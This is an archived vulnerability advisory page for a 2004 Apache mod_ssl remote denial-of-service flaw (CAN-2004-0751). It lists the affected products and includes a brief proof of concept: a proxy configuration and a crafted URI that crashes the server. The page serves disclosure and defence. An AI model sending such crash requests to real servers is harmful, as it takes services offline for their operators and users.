exploits , vulnerabilities , articles , Apache mod_ssl Remote Denial of Service Vulnerability

Title	Apache mod_ssl Remote Denial of Service Vulnerability
Published	2004-09-10-12:00AM
Updated	2005-01-13-05:33PM
Class	Failure to Handle Exceptional Conditions
CVE	CAN-2004-0751
Remote	Yes
Local	No
Credit	Discovery is credited to M. "Alex" Hankins <lxhankins002@fastmail.fm>.
Vulnerable	Turbolinux Turbolinux Server 10.0 Turbolinux Turbolinux Desktop 10.0 Turbolinux Home Trustix Secure Linux 2.1 Trustix Secure Linux 2.0 Trustix Secure Enterprise Linux 2.0 RedHat Enterprise Linux WS 3 RedHat Enterprise Linux ES 3 RedHat Enterprise Linux AS 3 RedHat Desktop 3.0 MandrakeSoft Linux Mandrake 10.0 amd64 MandrakeSoft Linux Mandrake 10.0 MandrakeSoft Linux Mandrake 9.2 amd64 MandrakeSoft Linux Mandrake 9.2 HP Tru64 UNIX Compaq Secure Web Server 6.3 HP Tru64 UNIX Compaq Secure Web Server 5.9.2 HP Tru64 UNIX Compaq Secure Web Server 5.9.1 HP Tru64 UNIX Compaq Secure Web Server 5.8.2 HP Tru64 UNIX Compaq Secure Web Server 5.8.1 HP Tru64 UNIX Compaq Secure Web Server 5.1 A HP Tru64 UNIX Compaq Secure Web Server 5.1 HP Tru64 UNIX Compaq Secure Web Server 5.0 A HP Tru64 UNIX Compaq Secure Web Server 4.0 G HP Tru64 UNIX Compaq Secure Web Server 4.0 F HP HPUX B.11.23 HP HPUX B.11.22 HP HPUX B.11.11 HP HPUX B.11.00 Gentoo Linux 1.4 Conectiva Linux 10.0 Conectiva Linux 9.0 Apache Software Foundation Apache 2.0.50 MandrakeSoft Linux Mandrake 10.1 MandrakeSoft Linux Mandrake 10.1 x86_64 Apache Software Foundation Apache 2.0.47 Apple Mac OS X Server 10.1 Apple Mac OS X Server 10.1.1 Apple Mac OS X Server 10.1.2 Apple Mac OS X Server 10.1.3 Apple Mac OS X Server 10.1.4 Apple Mac OS X Server 10.1.5 Apple Mac OS X Server 10.2 Apple Mac OS X Server 10.2.1 Apple Mac OS X Server 10.2.2 Apple Mac OS X Server 10.2.3 Apple Mac OS X Server 10.2.4 Apple Mac OS X Server 10.2.5 Apple Mac OS X Server 10.2.6 Apple Mac OS X Server 10.2.7 Apple Mac OS X Server 10.2.8 Apple Mac OS X Server 10.3 Apple Mac OS X Server 10.3.1 Apple Mac OS X Server 10.3.2 Apple Mac OS X Server 10.3.3 Apple Mac OS X Server 10.3.4 Apple Mac OS X Server 10.3.5 MandrakeSoft Linux Mandrake 9.1 MandrakeSoft Linux Mandrake 9.1 ppc MandrakeSoft Linux Mandrake 9.2 MandrakeSoft Linux Mandrake 9.2 amd64
Not Vulnerable	HP Tru64 UNIX Compaq Secure Web Server 6.3.2 a Apache Software Foundation Apache 2.0.51 RedHat Fedora Core1
Code	No exploit is required. The following proof of concept is available: With the following configuration in httpd.conf: Listen 47290 SSLProxyEngine on RewriteEngine on RewriteRule /(.*) https://www.example.com/$1 [P] The server may be crashed by issuing the following URI: http://www.example.com:47290/eRoomASP/CookieTest.asp?facility=facility&URL=%2FeRoom%2FFacility%2FRoom%2F0_4242
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-11 RT Session Fixation Vulnerability
• 2009-12-11 Multiple HP LaserJet Printers Unauthorized Access and Denial of Service Vulnerability
• 2009-12-11 Sun Ray Server Authentication Manager Remote Code Execution Vulnerability
• 2009-12-10 GNU Coreutils Insecure Temporary File Creation Vulnerability
• 2009-12-10 WebKit SVG Animation Elements User After Free Remote Code Execution Vulnerability
• 2009-12-10 Moodle Multiple Vulnerabilities
• 2009-12-10 Linux Kernel KVM Large SMP Instruction Local Denial of Service Vulnerability
• 2009-12-09 Adobe Flash Player and AIR Data Injection Remote Code Execution Vulnerability
• 2009-12-09 Adobe Flash Player ActiveX Control Information Disclosure Vulnerability
• 2009-12-09 Adobe Flash Player and AIR Multiple Unspecified Remote Code Execution Vulnerabilities

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Fri, 11 Dec 2009 21:11:45 +0000